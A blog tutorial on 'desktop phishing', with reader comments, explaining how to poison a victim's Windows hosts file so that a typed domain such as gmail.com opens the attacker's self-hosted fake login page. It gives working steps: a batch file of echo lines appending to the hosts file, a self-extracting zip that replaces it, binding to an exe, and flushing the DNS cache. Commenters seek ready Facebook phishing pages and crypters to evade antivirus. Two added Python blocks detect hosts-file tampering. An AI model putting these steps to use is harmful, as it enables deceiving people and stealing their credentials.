Desktop Phishing - Step by step tutorial

It is an advanced form of phishing. Kindly read my previous post on normal phishing here before proceeding. The difference between phishing and desktop phishing is as follows.

In phishing:

1. Attacker convinces the victim to click on a link to a fake login page which resembles a genuine login page.
2. Victim enters his credentials in the fake login page, and they go to the attacker.
3. Victim is then redirected to an error page or the genuine website, depending on the attacker.

But the main drawback of phishing is that the victim can easily differentiate between the fake and the real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.

In desktop phishing:
1. Attacker sends an executable/batch file to the victim, and the victim is supposed to double-click on it. Attacker's job is done.
2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn't come to know.
3. The rest is the same as in normal phishing.


What is the hosts file?

The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com, a query is sent to the Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.

Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.

What is the attack?
I hope you have got an idea of how modification of this hosts file on the victim's computer can be misused. We need to modify the victim's hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he would be directed to our fake login page, and the domain name in the URL box would remain genuine as typed by the victim. Hence the domain name is spoofed.

Two steps to perform the attack:
1. Create and host the phishing page on your computer.
2. Modify the victim's hosts file.

Step 1:

Web hosting sites like 110mb.com, ripway.com, etc., where we usually upload our phishing page, do not provide an IP that points to your website, like www.anything.110mb.com. An IP address points to a web server and not a website. So we need to host the phishing page on our own computer using web server software like WAMP or XAMPP.
Kindly read my simple tutorial on setting up the XAMPP web server here and this step will be clear to you.

Step 2. This step can be performed in two different ways.

Method 1 - Send the victim a zip file containing the modified hosts file. When the zip file is clicked, it automatically replaces the victim's original hosts file with the modified hosts file.

Copy your hosts file and paste it anywhere. Modify it as you need: edit it with any text editor and associate your public IP address with the domain you wish, as shown.

In this case, when the victim visits gmail.com, he would be taken to the website hosted on IP 'xxx.xxx.xxx.xxx'. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location C:\Windows\system32\drivers\etc and the victim's hosts file gets replaced by our modified hosts file.

Then you can bind this file with any exe (using a binder) or give it directly to the victim. He is supposed to click it and you are done.

Method 2 - Create a batch file which modifies the hosts file as per your need.
Open Notepad and type the following text:

echo xxx.xxx.xxx.xxx www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts

Obviously, replace the IP and website with your own.

Save the file as 'all files' instead of txt files and name it anything.bat. The extension must be .bat.
When the victim runs this file, a new entry will be made in the hosts file.

You can test both of the above methods on your own hosts file.
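Both methods above leave a recognisable trace in process command-line logs. The following is an added detection example, not code from the original post: it flags command lines that append to, overwrite or copy over the hosts file, and treats the `ipconfig /flushdns` step mentioned in the comments as corroboration. The rule names, severity labels and sample command lines are constructed assumptions.

```python
import re

# Hosts directory as written on the page, plus common environment-variable forms.
ETC_DIR = r"(?:[a-z]:\\windows|%systemroot%|%windir%)\\system32\\drivers\\etc"
HOSTS_FILE = ETC_DIR + r"\\hosts\b"

RULES = [
    # echo ... >> ...\etc\hosts  (the batch-file method)
    ("hosts-append", re.compile(r'>>\s*"?' + HOSTS_FILE, re.I)),
    # a single '>' truncates and rewrites the file
    ("hosts-overwrite", re.compile(r'(?<!>)>\s*"?' + HOSTS_FILE, re.I)),
    # copy/move with the etc directory as the destination (the replace-the-file method)
    ("hosts-copy", re.compile(
        r'\b(?:copy|xcopy|move)\b[^|&]*\s"?' + ETC_DIR
        + r'(?:\\hosts)?\\?"?\s*(?:$|[&|])', re.I)),
    # harmless on its own; raises severity when seen together with a hosts write
    ("dns-cache-flush", re.compile(r"\bipconfig(?:\.exe)?\s+/flushdns\b", re.I)),
]

# Constructed sample command lines (documentation-range IP, not real telemetry).
SAMPLE_CMDLINES = [
    r'cmd.exe /c echo 203.0.113.50 www.example.com >> C:\windows\system32\drivers\etc\hosts',
    r'cmd.exe /c copy /y hosts "%SystemRoot%\System32\drivers\etc\"',
    r'cmd.exe /c type C:\Windows\System32\drivers\etc\hosts',   # read only: ignored
    r'cmd.exe /c ipconfig /flushdns',
    r'cmd.exe /c echo done > C:\Temp\hosts.txt',                # other path: ignored
]

def scan(cmdlines):
    """Return (index, rule_name) for every rule that matches a command line."""
    return [(i, name) for i, cmd in enumerate(cmdlines)
            for name, rx in RULES if rx.search(cmd)]

def triage(cmdlines):
    """'none' without a hosts write, 'medium' with one, 'high' if a flush accompanies it."""
    rules = {name for _, name in scan(cmdlines)}
    if not rules - {"dns-cache-flush"}:
        return "none"
    return "high" if "dns-cache-flush" in rules else "medium"

if __name__ == "__main__":
    print(scan(SAMPLE_CMDLINES), triage(SAMPLE_CMDLINES))
```

This only inspects command lines, so pair it with file-integrity monitoring on the hosts file itself.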

Limitations of the attack:
1. Our public IP address is most probably dynamic, so it changes every time we disconnect and reconnect. To overcome this we need to purchase a static IP from our ISP.
2. The browser may warn the victim that the digital certificate of the website is not genuine.

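Countermeasures:
Never blindly enter your credentials in a login page, even if you yourself have typed the domain name in the web browser. Check whether the protocol is "http" or "https"; https is secure, and (as noted in the limitations above) the browser may warn you when the website's digital certificate is not genuine.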
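Because the hosts file is consulted before DNS, auditing it is a direct check for this attack. The following is an added example, not code from the original post: it parses a hosts file and reports entries that pin a watched domain or redirect any other name to a non-local address. The watch list and the sample file are constructed assumptions.

```python
import ipaddress

# Assumption: names worth watching; extend with your own mail, bank and SSO hosts.
WATCHED = {"gmail.com", "google.com", "facebook.com"}

# Constructed sample hosts file (documentation-range addresses, not real data).
SAMPLE_HOSTS = """\
# localhost name resolution is handled within DNS itself.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net      # blocklist-style sinkhole entry
203.0.113.50    gmail.com www.gmail.com
203.0.113.50    WWW.Facebook.com     # case and trailing comment are normalised
not-an-ip       broken.example
"""

def parse_hosts(text):
    """Yield (line_no, ip, hostname) for each active mapping in a hosts file."""
    for line_no, raw in enumerate(text.lstrip("\ufeff").splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split columns
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # first column is not an address
        for name in fields[1:]:                 # one line may carry several names
            yield line_no, ip, name.lower().rstrip(".")

def is_watched(name):
    """True for a watched domain or any of its subdomains."""
    return any(name == d or name.endswith("." + d) for d in WATCHED)

def audit(text):
    """Return (line_no, ip, hostname, reason) for entries that deserve review."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        if name == "localhost":
            continue
        if is_watched(name):
            findings.append((line_no, str(ip), name, "watched domain pinned locally"))
        elif not (ip.is_loopback or ip.is_unspecified):
            findings.append((line_no, str(ip), name, "non-local DNS override"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_HOSTS):
        print(finding)
```

To audit a real machine, pass the contents of C:\Windows\System32\drivers\etc\hosts to `audit()`.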

51 comments:

  1. Nice post dude!

  2. as a computer repair tech, to me your information is invaluable. Keep up the great work.

  3. Thanx friendz :)

  4. well done bravo
    very nice article
    thanks

  5. Can you provide a link for a binder program...
    I've tried downloading it but most of them have a virus...

  6. I have a question: someone told me if I added an IP and a link, my computer will get hacked... is it true?

  7. Well, after I made some changes to my hosts file, I found that your method is not working at all. I replaced xxx... with rediff's IP address but every time, and then typed google.com in my browser, but my browser opened google.com instead of rediff.com.
    What to do?
    Look here --

    # Copyright (c) 1993-2009 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    # 102.54.94.97 rhino.acme.com # source server
    # 38.25.63.10 x.acme.com # x client host

    # localhost name resolution is handled within DNS itself.
    # 127.0.0.1 localhost
    # ::1 localhost

    195.59.122.43 google.com
    195.59.122.43 www.google.com

  8. @benooi Yeah, it's not a good thing to reveal IP. But don't worry if victim is a layman.

    @anonymous
    The problem is that browser usually picks the IP addresses from DNS cache. Clear your browser history and everything.
    Moreover type this command
    ipconfig /flushdns
    and try again.

  9. It means I need to have access to the victim's PC so I can wash out his browser history plus the DNS flux... then it's a flop show.

  10. Thanks for the tremendous lectures. I want to ask how do I check on the passwords/usernames of my victim after sending the phished page to him. Will it be in the htdocs or where? I need help. Or how do I go about locating the username/password info?

  11. @Anonymous If you create a batch file you can delete the DNS cache by adding "ipconfig /flushdns"

    And if you create an SFX archive, it provides an option to execute another program or batch file to perform setup

  12. Good job Aneesh M. Makker. I have found it very useful. My friend once gave me a phishing file, but I recognized it. Now I will show him what desktop phishing is.

  13. super...........

  14. Can't it be done with IIS? should I use XAMPP or any software only?
    INFOTRON Krishna - "To Spread the wide knowledge of computers"

  15. Great post buddy... not yet tried but soon will... and let you know results

  16. Nice work... Keep it Up. :)

  17. CAN YOU PLEASE EXPLAIN IN DETAIL HOW TO USE XAMPP 1.7.3 I WANT TO SEE MY PAGE ANYWHERE IN WORLD.AND HOW TO USE IT FOR DYNAMIC IP ADDRESS

  18. CAN YOU PLEASE EXPLAIN IN DETAIL HOW TO USE XAMPP 1.7.3 I WANT TO SEE MY PAGE ANYWHERE IN WORLD.AND HOW TO USE IT FOR DYNAMIC IP ADDRESS

  19. Hello, what hosting site did you use for your phishing page?
    For I cannot find a site that allows

  20. Hello, what hosting site did you use for your phishing page?
    For I cannot find a site that works by typing the IP

  21. Fantabulous hacking trick dude, also seems like you're a PHP programmer, right??

  22. Hey buddy, I'm doing this trick in my hostel... it's just great

  23. Hey Aneesh, I want to be your STUDENT. Kindly reply to me if it is possible?
    I am waiting for your warm response
    harsit
    (harshitrules@in.com)

  24. gud

  25. Hi, it's a nice post, but how to detect it if I'm the victim

  26. Please, how can I locate my external IP

  27. Nice Post. Thanx

  28. Nice Post. Thanx

  29. Hi, can you please send me a ready-made Facebook phishing page? I am a unce with this stuff, and tell me how to get the info. I have done the file manager thing on 3GB

    i am grateful

  30. how to host your site from desktop

  31. Brilliant.
    More tutorials that are like this, should be around the Net.
    Shots for this bro, you make me proud.

  32. Hey, I tried this out. But I noticed when you type your URL and hit enter, the domain name changes simultaneously to the genuine URL... is that supposed to be normal? Thanks

  33. Aneesh M. Makker, thanks for the info. I have to share a thing; maybe I'm wrong as I'm new to this field, so:
    1st, a question: "in the hosts file can we use a no-ip address, or can some web hosting be opened like ip/~username; can't we use that instead of making a server? If the IP is dynamic then how can we do this, as when the router restarts it gets a new IP; of course not asking the ISP to make the IP static, as there are a lot of benefits of a dynamic IP :-) ANY OTHER METHOD TO GET VICTIM?
    2nd, I don't know if it is me or I don't know what, the hosts file doesn't affect Firefox, as it doesn't connect to the changed IP web address.
    Best regards P_CHARSI

  34. Please help me!!!! When I type localhost nothing works as it should

  35. Hi, can I learn phishing please..........

  36. Hello..
    Can we make a static IP through the FileZilla client and upload our phisher page... and then does this desktop phishing work or not?

  37. hello..
    Can we upload our files to FileZilla and can we get a static IP of our phisher uploaded on FileZilla... and then can we do desktop phishing?

  38. Thank you for providing wonderful information.

  39. Hi Aneesh,

    You are doing a great work here and I am pleased. How can I have a direct coaching from you like one week?
    Please I need to hear from you.
    I can send you my skype id if you can arrange that for me. A kind of be your scholar for sometime!
    Good luck and God bless...

    Nice.

  40. nice.... http://www.hvha.it/2012/04/speedup-internet-browsing-by-hosts-file.html

  41. Isn't it suspicious to send a batch file?
    I want you people to comment on this.

  42. Hey Aneesh... really loved your work... but I'm encountering some problem with your batch file method... the problem is that the hosts file is not getting modified at all... I made the batch file as per the steps given... but on double-clicking on it, there is no change in the hosts file... what am I doing wrong?

  43. What if you have two websites that you are hosting but there is one specific one you want them to go to; how would you include that in the hosts file..?

  44. It works but I was wondering if there was a way to replace the IP address with the file directory of a local file such as C:\\Test.html

  45. It's not working

  46. Friend, I have a problem for which I have been searching for so long but didn't get any solution so far. Can you tell me, is it possible to redirect the victim to the original Facebook so that the second time he logs in successfully even though we have poisoned his hosts file in desktop phishing? I tried a script which works fine and redirects to normal Facebook after phishing is done, but while doing desktop phishing, it lands the victim on the phished page only, again and again, after he enters his credentials. Any solution to this problem? And can you suggest me some really working FUD crypter which can protect the exe to poison the hosts file from antiviruses? They usually spoil the fun by detecting and removing the changes made to the hosts file of the victim. Please do reply. I have been knocking at the door of everyone for so long with this problem but so far no solution

  47. love this post... superb buddy..

  48. Bro, when I am sending the SFX file the victim's PC is showing a warning that there is a possible threat in the file and automatically deleting it :O help :(

  49. Bro, how can I host these phishing pages free.. please help me, I am waiting.. reply to me on kumar_avi@live.com

  50. Nice Tutorial.!! But got a problem :( ..when I try to open the archived hosts file.. it opens my WiFi login page instead of the phishing Facebook page...!!

  51. The tutorial is cool. I would like to ask if I can get a sort of direct teaching from you, because have got a couple of questions and am really willing to learn. This is my ID: newlandmarkprince@yahoo.com. You can likewise add me on your messenger. Thanks and look forward to hearing from you.
